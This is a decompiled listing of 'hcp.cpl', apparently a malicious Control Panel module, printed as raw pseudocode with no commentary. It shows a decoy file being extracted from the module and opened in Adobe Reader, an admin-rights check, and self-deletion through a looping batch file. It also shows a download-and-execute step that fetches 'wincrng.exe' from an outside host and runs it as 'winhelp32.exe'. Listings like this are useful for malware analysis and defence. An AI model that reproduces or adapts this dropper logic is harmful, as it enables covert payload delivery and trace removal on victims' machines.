hcp.cpl decompiled

//----- (100010B0) --------------------------------------------------------
int __cdecl MakeAndShowEgg()
{
  _UNKNOWN *v0; // eax@1
  HANDLE v1; // esi@1
  HANDLE v2; // ebp@1
  void *v3; // edi@1
  int result; // eax@5
  DWORD nNumberOfBytesToWrite; // [sp+10h] [bp-2C4h]@1
  LPCSTR lpApplicationName; // [sp+14h] [bp-2C0h]@3
  HKEY hKey; // [sp+18h] [bp-2BCh]@1
  DWORD NumberOfBytesRead; // [sp+1Ch] [bp-2B8h]@1
  DWORD cbData; // [sp+20h] [bp-2B4h]@2
  char v10; // [sp+24h] [bp-2B0h]@1
  int v11; // [sp+28h] [bp-2ACh]@1
  int v12; // [sp+2Ch] [bp-2A8h]@5
  DWORD NumberOfBytesWritten; // [sp+30h] [bp-2A4h]@1
  DWORD Type; // [sp+34h] [bp-2A0h]@2
  struct _STARTUPINFOA StartupInfo; // [sp+38h] [bp-29Ch]@3
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+7Ch] [bp-258h]@3
  char Buffer; // [sp+8Ch] [bp-248h]@1
  CHAR FileName; // [sp+CCh] [bp-208h]@1
  BYTE Data; // [sp+1D0h] [bp-104h]@2

  v0 = sub_10001A0D();
  AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v11, v0);
  GetModuleFileNameA((HMODULE)0x10000000, &FileName, 0x104u);
  v1 = CreateFileA(&FileName, -2147483648u, 0, 0, 3u, 0, 0);
  SetFilePointer(v1, 1024, 0, 0);
  ReadFile(v1, &Buffer, 64u, &NumberOfBytesRead, 0);
  SetFilePointer(v1, 1088, 0, 0);
  ReadFile(v1, &nNumberOfBytesToWrite, 4u, &NumberOfBytesRead, 0);
  v2 = CreateFileA(&Buffer, 0x40000000u, 0, 0, 2u, 0, 0);
  SetFilePointer(v1, 24576, 0, 0);
  v3 = operator new(nNumberOfBytesToWrite);
  ReadFile(v1, v3, nNumberOfBytesToWrite, &NumberOfBytesRead, 0);
  WriteFile(v2, v3, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
  CloseHandle(v2);
  operator delete(v3);
  CloseHandle(v1);
  ShellExecuteA(0, "open", &Buffer, 0, 0, 1);
  CString__CString(&v10);
  if ( !RegOpenKeyExA(
          HKEY_LOCAL_MACHINE,
          "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\AcroRd32.exe",
          0,
          0x20019u,
          &hKey) )
  {
    cbData = 260;
    if ( !RegQueryValueExA(hKey, ValueName, 0, &Type, &Data, &cbData) )
    {
      CString__CString(&lpApplicationName);
      CString__Format(&lpApplicationName, (const char *)&unk_10003020, &Data);
      memset(&StartupInfo, 0, sizeof(StartupInfo));
      StartupInfo.cb = 68;
      StartupInfo.dwFlags = 1;
      StartupInfo.wShowWindow = 5;
      CreateProcessA(lpApplicationName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
      CString___CString(&lpApplicationName);
    }
    RegCloseKey(hKey);
  }
  CString___CString(&v10);
  result = v12;
  *(_DWORD *)(v12 + 4) = v11;
  return result;
}

//----- (100012E0) --------------------------------------------------------
char __cdecl IsAdmin()
{
  _UNKNOWN *v0; // eax@1
  HANDLE v1; // eax@1
  HANDLE v2; // eax@3
  char result; // al@4
  int v4; // eax@9
  void *v5; // esp@9
  unsigned int v6; // edi@15
  PSID *v7; // ebx@16
  char v8; // [sp+0h] [bp-2Ch]@9
  char v9; // [sp+4h] [bp-28h]@16
  int v10; // [sp+Ch] [bp-20h]@1
  int v11; // [sp+10h] [bp-1Ch]@4
  struct _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority; // [sp+14h] [bp-18h]@1
  PSID pSid; // [sp+1Ch] [bp-10h]@13
  DWORD ReturnLength; // [sp+20h] [bp-Ch]@5
  HANDLE TokenHandle; // [sp+24h] [bp-8h]@1
  char v16; // [sp+2Bh] [bp-1h]@15

  v0 = sub_10001A0D();
  AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v10, v0);
  pIdentifierAuthority.Value[0] = 0;
  pIdentifierAuthority.Value[1] = 0;
  pIdentifierAuthority.Value[2] = 0;
  pIdentifierAuthority.Value[3] = 0;
  pIdentifierAuthority.Value[4] = 0;
  pIdentifierAuthority.Value[5] = 5;
  v1 = GetCurrentThread();
  if ( !OpenThreadToken(v1, 8u, 0, &TokenHandle) )
  {
    if ( GetLastError() != 1008 )
    {
LABEL_12:
      result = 0;
      *(_DWORD *)(v11 + 4) = v10;
      return result;
    }
    v2 = GetCurrentProcess();
    if ( !OpenProcessToken(v2, 8u, &TokenHandle) )
    {
      *(_DWORD *)(v11 + 4) = v10;
      return 0;
    }
  }
  if ( GetTokenInformation(TokenHandle, TokenGroups, 0, 0, &ReturnLength) )
  {
    *(_DWORD *)(v11 + 4) = v10;
    return 0;
  }
  if ( GetLastError() != 122 )
  {
    result = 0;
    *(_DWORD *)(v11 + 4) = v10;
    return result;
  }
  v4 = ReturnLength + 3;
  LOBYTE(v4) = (ReturnLength + 3) & 0xFC;
  v5 = alloca(v4);
  if ( !&v8 )
  {
    *(_DWORD *)(v11 + 4) = v10;
    return 0;
  }
  if ( !GetTokenInformation(TokenHandle, TokenGroups, &v8, ReturnLength, &ReturnLength) )
    goto LABEL_12;
  if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
  {
    v6 = 0;
    v16 = 0;
    if ( *(_DWORD *)&v8 )
    {
      v7 = (PSID *)&v9;
      while ( !EqualSid(*v7, pSid) )
      {
        ++v6;
        v7 += 2;
        if ( v6 >= *(_DWORD *)&v8 )
          goto LABEL_21;
      }
      v16 = 1;
    }
LABEL_21:
    FreeSid(pSid);
    result = v16;
    *(_DWORD *)(v11 + 4) = v10;
  }
  else
  {
    *(_DWORD *)(v11 + 4) = v10;
    result = 0;
  }
  return result;
}

//----- (10001490) --------------------------------------------------------
int __cdecl DeleteMyself()
{
  signed int v0; // ecx@1
  int v1; // edi@1
  _UNKNOWN *v2; // eax@1
  char v3; // zf@3
  signed int v4; // ecx@5
  signed int v5; // ecx@5
  unsigned int v6; // ebx@5
  CHAR *v7; // edi@5
  const void *v8; // esi@5
  char v9; // zf@7
  HANDLE v10; // esi@9
  int v11; // eax@10
  HANDLE v12; // eax@11
  HANDLE v13; // eax@11
  int result; // eax@12
  int v15; // [sp+Ch] [bp-650h]@1
  int v16; // [sp+10h] [bp-64Ch]@12
  struct _PROCESS_INFORMATION ProcessInformation; // [sp+14h] [bp-648h]@10
  DWORD NumberOfBytesWritten; // [sp+24h] [bp-638h]@10
  struct _STARTUPINFOA StartupInfo; // [sp+28h] [bp-634h]@10
  CHAR FileName; // [sp+6Ch] [bp-5F0h]@1
  CHAR String2; // [sp+170h] [bp-4ECh]@1
  CHAR String; // [sp+274h] [bp-3E8h]@10

  v2 = sub_10001A0D();
  AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v15, v2);
  GetModuleFileNameA((HMODULE)0x10000000, &String2, 0x104u);
  lstrcpyA(&FileName, &String2);
  *strrchr(&FileName, 92) = 0;
  v1 = (int)"\\DMS.bat";
  v0 = -1;
  do
  {
    if ( !v0 )
      break;
    v3 = *(_BYTE *)v1++ == 0;
    --v0;
  }
  while ( !v3 );
  v5 = ~v0;
  v8 = (const void *)(v1 - v5);
  v6 = v5;
  v7 = &FileName;
  v4 = -1;
  do
  {
    if ( !v4 )
      break;
    v9 = *v7++ == 0;
    --v4;
  }
  while ( !v9 );
  memcpy(v7 - 1, v8, v6);
  v10 = CreateFileA(&FileName, 0x40000000u, 0, 0, 2u, 0x8000080u, 0);
  if ( v10 != (HANDLE)-1 )
  {
    wsprintfA(
      &String,
      ":Repeat\r\nDEL \"%s\"\r\nif exist \"%s\" goto Repeat\r\nDEL \"%s\"\r\n",
      &String2,
      &String2,
      &FileName);
    v11 = lstrlenA(&String);
    WriteFile(v10, &String, v11, &NumberOfBytesWritten, 0);
    CloseHandle(v10);
    memset(&StartupInfo, 0, sizeof(StartupInfo));
    StartupInfo.wShowWindow = 0;
    StartupInfo.cb = 68;
    StartupInfo.dwFlags = 1;
    if ( CreateProcessA(0, &FileName, 0, 0, 0, 0x44u, 0, L"\\", &StartupInfo, &ProcessInformation) )
    {
      SetThreadPriority(ProcessInformation.hThread, -15);
      v12 = GetCurrentThread();
      SetThreadPriority(v12, 15);
      v13 = GetCurrentProcess();
      SetPriorityClass(v13, 0x80u);
      CloseHandle(ProcessInformation.hProcess);
      ResumeThread(ProcessInformation.hThread);
      CloseHandle(ProcessInformation.hThread);
    }
  }
  GetLastError();
  PostQuitMessage(0);
  result = v16;
  *(_DWORD *)(v16 + 4) = v15;
  return result;
}

//----- (100017A0) --------------------------------------------------------
char __cdecl StartUp()
{
  _UNKNOWN *v0; // eax@1
  int v2; // [sp+0h] [bp-10Ch]@1
  int v3; // [sp+4h] [bp-108h]@3
  CHAR PathName; // [sp+8h] [bp-104h]@1

  v0 = sub_10001A0D();
  AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v2, v0);
  SHGetSpecialFolderPathA(0, &PathName, 26, 0);
  SetCurrentDirectoryA(&PathName);
  if ( (unsigned __int8)DownloadFile("winhelp32.exe", (int)"http://academyhouse.us/from/wincrng.exe") )
    WinExec("winhelp32.exe", 5u);
  MakeAndShowEgg();
  DeleteMyself();
  *(_DWORD *)(v3 + 4) = v2;
  return 1;
}